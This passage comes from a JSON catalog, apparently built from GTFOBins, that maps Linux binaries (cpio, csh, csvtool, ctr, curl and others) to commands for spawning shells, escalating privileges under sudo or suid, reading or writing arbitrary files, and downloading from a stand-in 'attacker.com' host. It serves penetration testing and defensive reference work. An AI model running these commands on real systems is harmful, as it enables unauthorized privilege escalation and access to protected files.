command.","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpan:inherit:0:unprivileged","toolId":"gtfo:cpan","toolName":"cpan","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cpan\n! ...","description":"Perl code can be executed with the `!` command.","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-read:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-read:0:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-read:0:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-read:1:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -R $UID -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-read:1:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -R $UID -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-read:1:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-write:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -R 0:0 -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-write:0:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -R 0:0 -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-write:0:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:shell:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh </dev/tty >/dev/tty' >localhost\ncpio -o --rsh-command /bin/sh -F localhost:","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpulimit:shell:0:sudo","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpulimit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpulimit:shell:0:suid","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpulimit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpulimit:shell:0:unprivileged","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpulimit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crash:command:0:sudo","toolId":"gtfo:crash","toolName":"crash","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"CRASHPAGER=/path/to/command crash -h","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crash:command:0:unprivileged","toolId":"gtfo:crash","toolName":"crash","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"CRASHPAGER=/path/to/command crash -h","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crash:inherit:0:sudo","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crash:inherit:0:suid","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/crash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crash:inherit:0:unprivileged","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crontab:command:0:sudo","toolId":"gtfo:crontab","toolName":"crontab","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"crontab -e","description":"This spaws the default editor to edit the crontab file, commands can be scheduled to run using the [cron syntax](https://en.wikipedia.org/wiki/Cron).","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crontab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crontab:command:0:unprivileged","toolId":"gtfo:crontab","toolName":"crontab","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"crontab -e","description":"This spaws the default editor to edit the crontab file, commands can be scheduled to run using the [cron syntax](https://en.wikipedia.org/wiki/Cron).","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crontab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crontab:inherit:0:sudo","toolId":"gtfo:crontab","toolName":"crontab","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"crontab -e","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crontab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crontab:inherit:0:unprivileged","toolId":"gtfo:crontab","toolName":"crontab","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"crontab -e","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crontab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csh:file-write:0:sudo","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csh:file-write:0:suid","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file' -b","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csh:file-write:0:unprivileged","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csh:shell:0:sudo","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csh:shell:0:suid","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csh -b","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csh:shell:0:unprivileged","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"csh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csplit:file-read:0:sudo","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csplit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csplit:file-read:0:suid","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csplit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csplit:file-read:0:unprivileged","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csplit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csplit:file-write:0:sudo","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csplit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csplit:file-write:0:suid","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csplit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csplit:file-write:0:unprivileged","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csplit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:file-read:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:file-read:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:file-read:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:file-write:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:file-write:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:file-write:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:shell:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:shell:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:shell:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ctr:shell:0:sudo","toolId":"gtfo:ctr","toolName":"ctr","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ctr run --rm --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest x","description":"An image must be already present, for example:\n\n```\nctr images pull docker.io/library/alpine:latest\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ctr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ctr:shell:0:suid","toolId":"gtfo:ctr","toolName":"ctr","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ctr run --rm --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest x","description":"An image must be already present, for example:\n\n```\nctr images pull docker.io/library/alpine:latest\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ctr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cupsfilter:file-read:0:sudo","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cupsfilter:file-read:0:suid","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cupsfilter:file-read:0:unprivileged","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:download:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:download:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:download:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS 